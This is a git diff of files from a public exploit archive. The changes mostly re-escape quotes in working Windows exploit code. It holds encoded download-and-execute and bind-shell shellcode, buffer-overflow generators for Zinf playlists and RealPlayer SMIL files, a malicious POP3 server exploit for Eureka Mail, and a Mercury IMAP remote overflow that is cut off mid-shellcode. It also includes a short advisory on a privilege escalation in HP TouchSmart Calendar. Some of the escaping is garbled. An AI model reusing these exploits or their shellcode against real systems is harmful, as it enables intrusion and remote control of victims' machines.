+\"\\xeb\\x10\\x5a\\x4a\\x33\\xc9\\x66\\xb9\\x3c\\x01\\x80\\x34\\x0a\\x99\\xe2\\xfa\"
+\"\\xeb\\x05\\xe8\\xeb\\xff\\xff\\xff\\x70\\x4c\\x99\\x99\\x99\\xc3\\xfd\\x38\\xa9\"
+\"\\x99\\x99\\x99\\x12\\xd9\\x95\\x12\\xe9\\x85\\x34\\x12\\xd9\\x91\\x12\\x41\\x12\"
+\"\\xea\\xa5\\x12\\xed\\x87\\xe1\\x9a\\x6a\\x12\\xe7\\xb9\\x9a\\x62\\x12\\xd7\\x8d\"
+\"\\xaa\\x74\\xcf\\xce\\xc8\\x12\\xa6\\x9a\\x62\\x12\\x6b\\xf3\\x97\\xc0\\x6a\\x3f\"
+\"\\xed\\x91\\xc0\\xc6\\x1a\\x5e\\x9d\\xdc\\x7b\\x70\\xc0\\xc6\\xc7\\x12\\x54\\x12\"
+\"\\xdf\\xbd\\x9a\\x5a\\x48\\x78\\x9a\\x58\\xaa\\x50\\xff\\x12\\x91\\x12\\xdf\\x85\"
+\"\\x9a\\x5a\\x58\\x78\\x9b\\x9a\\x58\\x12\\x99\\x9a\\x5a\\x12\\x63\\x12\\x6e\\x1a\"
+\"\\x5f\\x97\\x12\\x49\\xf3\\x9d\\xc0\\x71\\xc9\\x99\\x99\\x99\\x1a\\x5f\\x94\\xcb\"
+\"\\xcf\\x66\\xce\\x65\\xc3\\x12\\x41\\xf3\\x98\\xc0\\x71\\xa4\\x99\\x99\\x99\\x1a\"
+\"\\x5f\\x8a\\xcf\\xdf\\x19\\xa7\\x19\\xec\\x63\\x19\\xaf\\x19\\xc7\\x1a\\x75\\xb9\"
+\"\\x12\\x45\\xf3\\xb9\\xca\\x66\\xce\\x75\\x5e\\x9d\\x9a\\xc5\\xf8\\xb7\\xfc\\x5e\"
+\"\\xdd\\x9a\\x9d\\xe1\\xfc\\x99\\x99\\xaa\\x59\\xc9\\xc9\\xca\\xcf\\xc9\\x66\\xce\"
+\"\\x65\\x12\\x45\\xc9\\xca\\x66\\xce\\x69\\xc9\\x66\\xce\\x6d\\xaa\\x59\\x35\\x1c\"
+\"\\x59\\xec\\x60\\xc8\\xcb\\xcf\\xca\\x66\\x4b\\xc3\\xc0\\x32\\x7b\\x77\\xaa\\x59\"
+\"\\x5a\\x71\\xbf\\x66\\x66\\x66\\xde\\xfc\\xed\\xc9\\xeb\\xf6\\xfa\\xd8\\xfd\\xfd\"
+\"\\xeb\\xfc\\xea\\xea\\x99\\xde\\xfc\\xed\\xca\\xe0\\xea\\xed\\xfc\\xf4\\xdd\\xf0\"
+\"\\xeb\\xfc\\xfa\\xed\\xf6\\xeb\\xe0\\xd8\\x99\\xce\\xf0\\xf7\\xdc\\xe1\\xfc\\xfa\"
+\"\\x99\\xdc\\xe1\\xf0\\xed\\xcd\\xf1\\xeb\\xfc\\xf8\\xfd\\x99\\xd5\\xf6\\xf8\\xfd\"
+\"\\xd5\\xf0\\xfb\\xeb\\xf8\\xeb\\xe0\\xd8\\x99\\xec\\xeb\\xf5\\xf4\\xf6\\xf7\\x99\"
+\"\\xcc\\xcb\\xd5\\xdd\\xf6\\xee\\xf7\\xf5\\xf6\\xf8\\xfd\\xcd\\xf6\\xdf\\xf0\\xf5\"
+\"\\xfc\\xd8\\x99\";
 
 int main(int argc, char *argv[]) {
   FILE* rasfile;
   char evilbuff[4000];
   
   if (argc!=3) {
-    printf("Usage: %s  \n",argv[0]);
+    printf(\"Usage: %s  \\n\",argv[0]);
     return 0;
   }
 	
@@ -305,8 +305,8 @@ int main(int argc, char *argv[]) {
   memcpy(evilbuff+0x380+sizeof(DownExec)-1,argv[1],strlen(argv[1]));
   memset(evilbuff+0x380+sizeof(DownExec)-1+strlen(argv[1]),0x80,1);
 		
-  if ((rasfile=fopen(argv[2],"wb"))==0) {
-    printf("[-] Unable to access file.\n");
+  if ((rasfile=fopen(argv[2],\"wb\"))==0) {
+    printf(\"[-] Unable to access file.\\n\");
     return 0;
   }
   
diff --git a/platforms/windows/local/40636.txt b/platforms/windows/local/40636.txt
new file mode 100755
index 000000000..ce992b77f
--- /dev/null
+++ b/platforms/windows/local/40636.txt
@@ -0,0 +1,98 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/HP-TOUCHSMART-CALENDAR-PRIVILEGE-ESCALATION.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==========
+www.hp.com
+
+
+
+Product:
+===========================================
+Hewlett Packard TouchSmart Calendar Service
+File version : 4.1.4245
+
+HP TouchSmart Calendar is a shared calendar where you can manage your family’s schedule. You can also view scheduled events for today
+and tomorrow, e-mail calendar events with Google mail, and print your schedule.
+
+
+
+Vulnerability Type:
+=====================
+Privilege Escalation
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+HP Calendar Service uses weak insecure permissions settings on its files/directory as the “Everyone” group has full access on it.
+Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges
+on the affected system.
+
+Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code
+or replace the "HPTouchSmartSyncCalReminderApp.exe" executable and have it run in the context of the system.
+
+
+Proof... 
+
+c:\Windows\System32>sc query "HP Support Assistant Service"
+
+SERVICE_NAME: HP Support Assistant Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        STATE              : 4  RUNNING
+                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
+        WIN32_EXIT_CODE    : 0  (0x0)
+        SERVICE_EXIT_CODE  : 0  (0x0)
+        CHECKPOINT         : 0x0
+        WAIT_HINT          : 0x0
+
+
+c:\>cacls "C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service"
+C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service Everyone:(OI)(CI)F
+                                                                   NT AUTHORITY\SYSTEM:(OI)(CI)F
+
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification:  October 14, 2016
+Vendor response: Product past warranty support
+October 26, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+
+Severity Level:
+================
+Medium
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx
diff --git a/platforms/windows/local/559.c b/platforms/windows/local/559.c
index 728dee5b3..92dc74a4e 100755
--- a/platforms/windows/local/559.c
+++ b/platforms/windows/local/559.c
@@ -3,14 +3,14 @@
 -------------------------------Advisory----------------------------------
 Luigi Auriemma 
 
-I don't know why this bug has not been tracked but moreover I don't
+I don\'t know why this bug has not been tracked but moreover I don\'t
 completely know why it has not been fixed yet in the Windows version of
 Zinf.
 
 In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
 The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
 which is still vulnerable to a buffer-overflow bug in the management of the
-playlist files ".pls".
+playlist files \".pls\".
 
 This bug has been found and fixed by the same developers in the recent
 versions for Linux but, as already said, the vulnerable Windows version is
@@ -21,7 +21,7 @@ A simple proof-of-concept to test the bug is available here:
 
   http://aluigi.altervista.org/poc/zinf-bof.pls
 
-That's all, just to keep track of this bug and to warn who uses the Windows
+That\'s all, just to keep track of this bug and to warn who uses the Windows
 version.
 
 
@@ -52,20 +52,20 @@ jumps into a service pack independent address then it downloads and executes a f
 #define SIZE 4048
 
 
-char shellcode[] = "\xEB"//xored with 0x1d
-"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
-"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
-"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
-"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
-"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
-"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
-"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
-"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
-"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
-"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
-"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
-"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
-"\x78\x65\x78\x1D";
+char shellcode[] = \"\\xEB\"//xored with 0x1d
+\"\\x10\\x58\\x31\\xC9\\x66\\x81\\xE9\\x22\\xFF\\x80\\x30\\x1D\\x40\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\"
+\"\\xFF\\xFF\\xF4\\xD1\\x1D\\x1D\\x1D\\x42\\xF5\\x4B\\x1D\\x1D\\x1D\\x94\\xDE\\x4D\\x75\\x93\\x53\\x13\"
+\"\\xF1\\xF5\\x7D\\x1D\\x1D\\x1D\\x2C\\xD4\\x7B\\xA4\\x72\\x73\\x4C\\x75\\x68\\x6F\\x71\\x70\\x49\\xE2\"
+\"\\xCD\\x4D\\x75\\x2B\\x07\\x32\\x6D\\xF5\\x5B\\x1D\\x1D\\x1D\\x2C\\xD4\\x4C\\x4C\\x90\\x2A\\x4B\\x90\"
+\"\\x6A\\x15\\x4B\\x4C\\xE2\\xCD\\x4E\\x75\\x85\\xE3\\x97\\x13\\xF5\\x30\\x1D\\x1D\\x1D\\x4C\\x4A\\xE2\"
+\"\\xCD\\x2C\\xD4\\x54\\xFF\\xE3\\x4E\\x75\\x63\\xC5\\xFF\\x6E\\xF5\\x04\\x1D\\x1D\\x1D\\xE2\\xCD\\x48\"
+\"\\x4B\\x79\\xBC\\x2D\\x1D\\x1D\\x1D\\x96\\x5D\\x11\\x96\\x6D\\x01\\xB0\\x96\\x75\\x15\\x94\\xF5\\x43\"
+\"\\x40\\xDE\\x4E\\x48\\x4B\\x4A\\x96\\x71\\x39\\x05\\x96\\x58\\x21\\x96\\x49\\x18\\x65\\x1C\\xF7\\x96\"
+\"\\x57\\x05\\x96\\x47\\x3D\\x1C\\xF6\\xFE\\x28\\x54\\x96\\x29\\x96\\x1C\\xF3\\x2C\\xE2\\xE1\\x2C\\xDD\"
+\"\\xB1\\x25\\xFD\\x69\\x1A\\xDC\\xD2\\x10\\x1C\\xDA\\xF6\\xEF\\x26\\x61\\x39\\x09\\x68\\xFC\\x96\\x47\"
+\"\\x39\\x1C\\xF6\\x7B\\x96\\x11\\x56\\x96\\x47\\x01\\x1C\\xF6\\x96\\x19\\x96\\x1C\\xF5\\xF4\\x1F\\x1D\"
+\"\\x1D\\x1D\\x2C\\xDD\\x94\\xF7\\x42\\x43\\x40\\x46\\xDE\\xF5\\x32\\xE2\\xE2\\xE2\\x70\\x75\\x75\\x33\"
+\"\\x78\\x65\\x78\\x1D\";
 
 
 
@@ -76,8 +76,8 @@ char shellcode[] = "\xEB"//xored with 0x1d
 int main(){
 
 char buffer[SIZE];
-char exploit[]="exploit.pls";
-char head[]="[playlist]File1=";
+char exploit[]=\"exploit.pls\";
+char head[]=\"[playlist]File1=\";
 int i=0;
 ULONG bytes=0;
 char *pointer=NULL;
@@ -99,13 +99,13 @@ DWORD jump=0x909025eb;
 HANDLE file=NULL;
 
 //this is a small messageBox app
-char web[]="http://www.delikon.de/klein.exe";
+char web[]=\"http://www.delikon.de/klein.exe\";
 
 
-printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
-printf("Coded by Delikon|www.delikon.de|27.9.04\n");
-printf("all credits goes to Luigi Auriemma\n");
-printf("\n [+] generate exploit.pls\n");
+printf(\"A Buffer overflow exploit against Zinf 2.2.1 for Win32\\n\");
+printf(\"Coded by Delikon|www.delikon.de|27.9.04\\n\");
+printf(\"all credits goes to Luigi Auriemma\\n\");
+printf(\"\\n [+] generate exploit.pls\\n\");
 
 
 
@@ -116,8 +116,8 @@ memset(buffer,0x00,SIZE-1);
 
 if(file == (HANDLE)0xffffffff){
 
-	printf("\t[+] error opening the file\n");
-	printf("PRESS A KEY\n");
+	printf(\"\\t[+] error opening the file\\n\");
+	printf(\"PRESS A KEY\\n\");
 	getchar();
 	return -1;
 
@@ -130,7 +130,7 @@ if(file == (HANDLE)0xffffffff){
 	//
 	strcat(buffer,shellcode);
 	//search for the shellcode length
-	pointer=strstr(buffer,"\x22\xff");
+	pointer=strstr(buffer,\"\\x22\\xff\");
 	//weblength[0]-=strlen(web)+1;
 	weblength-=strlen(web)+1;
 	//increase it
@@ -172,7 +172,7 @@ if(file == (HANDLE)0xffffffff){
 	WriteFile(file,buffer,strlen(buffer),&bytes,0);
 
 	CloseHandle(file);
-	printf("\n [+] ready press a key\n");
+	printf(\"\\n [+] ready press a key\\n\");
 	getchar();
 
 
diff --git a/platforms/windows/local/863.cpp b/platforms/windows/local/863.cpp
index ac4bf82ec..22f3a64bc 100755
--- a/platforms/windows/local/863.cpp
+++ b/platforms/windows/local/863.cpp
@@ -2,16 +2,16 @@
 Coded by nolimit@CiSO & Buzzdee
 greets to COREiSO & #news & flare  & class101 & ESI & RVL & everyone else I forget
 This uses a seh overwrite method, which takes advantage of the SEH being placed
-in multiple locations over the different OS's. Because of this, it should be
+in multiple locations over the different OS\'s. Because of this, it should be
 completely universal. :).
 Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal with it and write your own in.
 
- C:\tools>nc -vv SERVER 1554 
+ C:\\tools>nc -vv SERVER 1554 
  SERVER [192.168.1.93] 1554 (?) open 
  Microsoft Windows 2000 [Version 5.00.2195] 
  (C) Copyright 1985-2000 Microsoft Corp. 
   
- C:\Program Files\Real\RealPlayer> 
+ C:\\Program Files\\Real\\RealPlayer> 
 
 */
 
@@ -19,46 +19,46 @@ Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal
 #include 
 #include 
 char pre[]=
-"\n"
-"  \n"
-"    \n"
-"      \n"
-"    \n"
-"  \n"
-"  \n"
-"    \\n\"
+\"  \\n\"
+\"    \\n\"
+\"      \\n\"
+\"    \\n\"
+\"  \\n\"
+\"  \\n\"
+\"    "
-"";
+\"  \"
+\"\";
 
 char overflow[1700];
 int main(int argc,char *argv[])
@@ -67,31 +67,31 @@ int main(int argc,char *argv[])
 	FILE *vuln;
 	if(argc == 1)
 	{
-		printf("RealPlayer 10 .smil file local buffer overflow.\n");
-		printf("Coded by nolimit & buzzdee.\n");
-		printf("Usage: %s \n",argv[0]);
+		printf(\"RealPlayer 10 .smil file local buffer overflow.\\n\");
+		printf(\"Coded by nolimit & buzzdee.\\n\");
+		printf(\"Usage: %s \\n\",argv[0]);
 		return 1;
 	}
-	vuln = fopen(argv[1],"w");
+	vuln = fopen(argv[1],\"w\");
 	//build overflow buffer here.
 	memset(overflow,0x90,sizeof(overflow)); //fill with nops
-	memcpy(overflow+1068,"\xeb\x08\xeb\x08",4); //
-	memcpy(overflow+1072,"\x4a\xe1\xc9\x61",4); // se handler in win xp (pop pop ret)
-	memcpy(overflow+1084,"\xeb\x08\xeb\x08",4); //
-	memcpy(overflow+1088,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) for small biz or something
-	memcpy(overflow+1100,"\xeb\x08\xeb\x08",4); //
-	memcpy(overflow+1104,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) enterprise
-	memcpy(overflow+1108,"\xeb\x08\xeb\x08",4); //jump +8 into nops
-	memcpy(overflow+1112,"\xbf\xbb\xA2\x60",4); //overwrite seh (win2k) with call ebx (pncrt.dll - hopefully universal ...^^)
+	memcpy(overflow+1068,\"\\xeb\\x08\\xeb\\x08\",4); //
+	memcpy(overflow+1072,\"\\x4a\\xe1\\xc9\\x61\",4); // se handler in win xp (pop pop ret)
+	memcpy(overflow+1084,\"\\xeb\\x08\\xeb\\x08\",4); //
+	memcpy(overflow+1088,\"\\xae\\x7f\\xA2\\x60\",4); // se handler in win2k3 (pop pop ret) for small biz or something
+	memcpy(overflow+1100,\"\\xeb\\x08\\xeb\\x08\",4); //
+	memcpy(overflow+1104,\"\\xae\\x7f\\xA2\\x60\",4); // se handler in win2k3 (pop pop ret) enterprise
+	memcpy(overflow+1108,\"\\xeb\\x08\\xeb\\x08\",4); //jump +8 into nops
+	memcpy(overflow+1112,\"\\xbf\\xbb\\xA2\\x60\",4); //overwrite seh (win2k) with call ebx (pncrt.dll - hopefully universal ...^^)
     memcpy(overflow+1125,shellcode,sizeof(shellcode)); //our shellcode after some nope to land in 
 
 	if(vuln)
 	{
 		//Write file
-		fprintf(vuln,"%s%s\"/>\n%s",pre,overflow,end);
+		fprintf(vuln,\"%s%s\\\"/>\\n%s\",pre,overflow,end);
 		fclose(vuln);
 	}
-	printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n");
+	printf(\"File written.Binds a shell on port 13579.\\nOpen with realplayer to exploit.\\n\");
 	return 0;
 }
 
diff --git a/platforms/windows/remote/10235.py b/platforms/windows/remote/10235.py
index 11c2de5a9..aa0cec77f 100755
--- a/platforms/windows/remote/10235.py
+++ b/platforms/windows/remote/10235.py
@@ -8,48 +8,48 @@
 import sys, socket
 
 # egghunter (32 bytes)
-egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
-"\x77\x30\x30\x74" # this is the egg: w00t
-"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
+egghunter = (\"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\"
+\"\\x77\\x30\\x30\\x74\" # this is the egg: w00t
+\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\")
 
 # windows/shell_bind_tcp - 368 bytes
 # http://www.metasploit.com
 # Encoder: x86/shikata_ga_nai
 # EXITFUNC=thread, LPORT=4444
 
-bindshell = ("\xbb\xd3\x82\x28\x36\xd9\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
-"\x56\x83\xee\xfc\x31\x5e\x0f\x03\x5e\xdc\x60\xdd\xca\x0a\xed"
-"\x1e\x33\xca\x8e\x97\xd6\xfb\x9c\xcc\x93\xa9\x10\x86\xf6\x41"
-"\xda\xca\xe2\xd2\xae\xc2\x05\x53\x04\x35\x2b\x64\xa8\xf9\xe7"
-"\xa6\xaa\x85\xf5\xfa\x0c\xb7\x35\x0f\x4c\xf0\x28\xff\x1c\xa9"
-"\x27\xad\xb0\xde\x7a\x6d\xb0\x30\xf1\xcd\xca\x35\xc6\xb9\x60"
-"\x37\x17\x11\xfe\x7f\x8f\x1a\x58\xa0\xae\xcf\xba\x9c\xf9\x64"
-"\x08\x56\xf8\xac\x40\x97\xca\x90\x0f\xa6\xe2\x1d\x51\xee\xc5"
-"\xfd\x24\x04\x36\x80\x3e\xdf\x44\x5e\xca\xc2\xef\x15\x6c\x27"
-"\x11\xfa\xeb\xac\x1d\xb7\x78\xea\x01\x46\xac\x80\x3e\xc3\x53"
-"\x47\xb7\x97\x77\x43\x93\x4c\x19\xd2\x79\x23\x26\x04\x25\x9c"
-"\x82\x4e\xc4\xc9\xb5\x0c\x81\x3e\x88\xae\x51\x28\x9b\xdd\x63"
-"\xf7\x37\x4a\xc8\x70\x9e\x8d\x2f\xab\x66\x01\xce\x53\x97\x0b"
-"\x15\x07\xc7\x23\xbc\x27\x8c\xb3\x41\xf2\x03\xe4\xed\xac\xe3"
-"\x54\x4e\x1c\x8c\xbe\x41\x43\xac\xc0\x8b\xf2\xea\x0e\xef\x57"
-"\x9d\x72\x0f\x46\x01\xfa\xe9\x02\xa9\xaa\xa2\xba\x0b\x89\x7a"
-"\x5d\x73\xfb\xd6\xf6\xe3\xb3\x30\xc0\x0c\x44\x17\x63\xa0\xec"
-"\xf0\xf7\xaa\x28\xe0\x08\xe7\x18\x6b\x31\x60\xd2\x05\xf0\x10"
-"\xe3\x0f\x62\xb0\x76\xd4\x72\xbf\x6a\x43\x25\xe8\x5d\x9a\xa3"
-"\x04\xc7\x34\xd1\xd4\x91\x7f\x51\x03\x62\x81\x58\xc6\xde\xa5"
-"\x4a\x1e\xde\xe1\x3e\xce\x89\xbf\xe8\xa8\x63\x0e\x42\x63\xdf"
-"\xd8\x02\xf2\x13\xdb\x54\xfb\x79\xad\xb8\x4a\xd4\xe8\xc7\x63"
-"\xb0\xfc\xb0\x99\x20\x02\x6b\x1a\x40\xe1\xb9\x57\xe9\xbc\x28"
-"\xda\x74\x3f\x87\x19\x81\xbc\x2d\xe2\x76\xdc\x44\xe7\x33\x5a"
-"\xb5\x95\x2c\x0f\xb9\x0a\x4c\x1a")
+bindshell = (\"\\xbb\\xd3\\x82\\x28\\x36\\xd9\\xc6\\xd9\\x74\\x24\\xf4\\x5e\\x2b\\xc9\\xb1\"
+\"\\x56\\x83\\xee\\xfc\\x31\\x5e\\x0f\\x03\\x5e\\xdc\\x60\\xdd\\xca\\x0a\\xed\"
+\"\\x1e\\x33\\xca\\x8e\\x97\\xd6\\xfb\\x9c\\xcc\\x93\\xa9\\x10\\x86\\xf6\\x41\"
+\"\\xda\\xca\\xe2\\xd2\\xae\\xc2\\x05\\x53\\x04\\x35\\x2b\\x64\\xa8\\xf9\\xe7\"
+\"\\xa6\\xaa\\x85\\xf5\\xfa\\x0c\\xb7\\x35\\x0f\\x4c\\xf0\\x28\\xff\\x1c\\xa9\"
+\"\\x27\\xad\\xb0\\xde\\x7a\\x6d\\xb0\\x30\\xf1\\xcd\\xca\\x35\\xc6\\xb9\\x60\"
+\"\\x37\\x17\\x11\\xfe\\x7f\\x8f\\x1a\\x58\\xa0\\xae\\xcf\\xba\\x9c\\xf9\\x64\"
+\"\\x08\\x56\\xf8\\xac\\x40\\x97\\xca\\x90\\x0f\\xa6\\xe2\\x1d\\x51\\xee\\xc5\"
+\"\\xfd\\x24\\x04\\x36\\x80\\x3e\\xdf\\x44\\x5e\\xca\\xc2\\xef\\x15\\x6c\\x27\"
+\"\\x11\\xfa\\xeb\\xac\\x1d\\xb7\\x78\\xea\\x01\\x46\\xac\\x80\\x3e\\xc3\\x53\"
+\"\\x47\\xb7\\x97\\x77\\x43\\x93\\x4c\\x19\\xd2\\x79\\x23\\x26\\x04\\x25\\x9c\"
+\"\\x82\\x4e\\xc4\\xc9\\xb5\\x0c\\x81\\x3e\\x88\\xae\\x51\\x28\\x9b\\xdd\\x63\"
+\"\\xf7\\x37\\x4a\\xc8\\x70\\x9e\\x8d\\x2f\\xab\\x66\\x01\\xce\\x53\\x97\\x0b\"
+\"\\x15\\x07\\xc7\\x23\\xbc\\x27\\x8c\\xb3\\x41\\xf2\\x03\\xe4\\xed\\xac\\xe3\"
+\"\\x54\\x4e\\x1c\\x8c\\xbe\\x41\\x43\\xac\\xc0\\x8b\\xf2\\xea\\x0e\\xef\\x57\"
+\"\\x9d\\x72\\x0f\\x46\\x01\\xfa\\xe9\\x02\\xa9\\xaa\\xa2\\xba\\x0b\\x89\\x7a\"
+\"\\x5d\\x73\\xfb\\xd6\\xf6\\xe3\\xb3\\x30\\xc0\\x0c\\x44\\x17\\x63\\xa0\\xec\"
+\"\\xf0\\xf7\\xaa\\x28\\xe0\\x08\\xe7\\x18\\x6b\\x31\\x60\\xd2\\x05\\xf0\\x10\"
+\"\\xe3\\x0f\\x62\\xb0\\x76\\xd4\\x72\\xbf\\x6a\\x43\\x25\\xe8\\x5d\\x9a\\xa3\"
+\"\\x04\\xc7\\x34\\xd1\\xd4\\x91\\x7f\\x51\\x03\\x62\\x81\\x58\\xc6\\xde\\xa5\"
+\"\\x4a\\x1e\\xde\\xe1\\x3e\\xce\\x89\\xbf\\xe8\\xa8\\x63\\x0e\\x42\\x63\\xdf\"
+\"\\xd8\\x02\\xf2\\x13\\xdb\\x54\\xfb\\x79\\xad\\xb8\\x4a\\xd4\\xe8\\xc7\\x63\"
+\"\\xb0\\xfc\\xb0\\x99\\x20\\x02\\x6b\\x1a\\x40\\xe1\\xb9\\x57\\xe9\\xbc\\x28\"
+\"\\xda\\x74\\x3f\\x87\\x19\\x81\\xbc\\x2d\\xe2\\x76\\xdc\\x44\\xe7\\x33\\x5a\"
+\"\\xb5\\x95\\x2c\\x0f\\xb9\\x0a\\x4c\\x1a\")
 
-buff = ("\x41" * 710);
-retn = ("\x53\x93\x42\x7e"); #JMP ESP USER32.DLL XPSP3
-nops = ("\x90" * 218);
-junk = ("\xcc" * 2000);
-sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell);
+buff = (\"\\x41\" * 710);
+retn = (\"\\x53\\x93\\x42\\x7e\"); #JMP ESP USER32.DLL XPSP3
+nops = (\"\\x90\" * 218);
+junk = (\"\\xcc\" * 2000);
+sploit = (\"-ERR \" + buff + retn + egghunter + nops + junk + \"w00tw00t\" + bindshell);
 
-print ("""
+print (\"\"\"
 ##########################################################
 #
 # Eureka Mail Client Remote Buffer Overflow Exploit (XPSP3)
@@ -60,20 +60,20 @@ print ("""
 # Note: Point the client to this address and check your mail
 #
 ##########################################################
-""")
+\"\"\")
 
 try:
 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	s.bind(('', 110))
+	s.bind((\'\', 110))
 	s.listen(1)
-	print ("[*] Listening on port 110.")
-	print ("[*] Have someone connect to you.")
-	print ("[*] Type -c to exit.")
+	print (\"[*] Listening on port 110.\")
+	print (\"[*] Have someone connect to you.\")
+	print (\"[*] Type -c to exit.\")
 	conn, addr = s.accept()
-	print '[*] Received connection from: ', addr
+	print \'[*] Received connection from: \', addr
 
 	while 1:
 		conn.send(sploit)
 	conn.close()
 except:
-	print ("[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444")
+	print (\"[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444\")
diff --git a/platforms/windows/remote/1223.c b/platforms/windows/remote/1223.c
index 2c0b484e3..708b8fb88 100755
--- a/platforms/windows/remote/1223.c
+++ b/platforms/windows/remote/1223.c
@@ -1,6 +1,6 @@
 /*   
      Mercury imap4 server remote buffer overflow exploit
-     author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
+     author : c0d3r \"kaveh razavi\" c0d3r@ihsteam.com c0d3r@c0d3r.org
      package : Mercury mail transport system 4.01a and prolly prior
      workaround : upgrade to 4.01b version
      advisory : not available right now 
@@ -29,7 +29,7 @@
 /*
 /*
 
-D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc
+D:\\projects>mercury_imap.exe ihs 143 4 c0d3r abc
 
 -------- mercury imap remote BOF exploit by c0d3r
 
@@ -50,7 +50,7 @@ D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc
 Microsoft Windows [Version 5.2.3790]
 (C) Copyright 1985-2003 Microsoft Corp.
 
-H:\MERCURY>
+H:\\MERCURY>
 
 */
 
@@ -58,7 +58,7 @@ H:\MERCURY>
 #include 
 #include 
 #include 
-#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, \"ws2_32.lib\")
 #define NOP 0x90
 #define size 625
 // nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1   
@@ -68,28 +68,28 @@ H:\MERCURY>
 // bad chars : 0x00 0x0a 0x20 0x0d
 
 char shellcode[]=
-"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
-"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4"
-"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0"
-"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2"
-"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13"
-"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0"
-"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0"
-"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b"
-"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb"
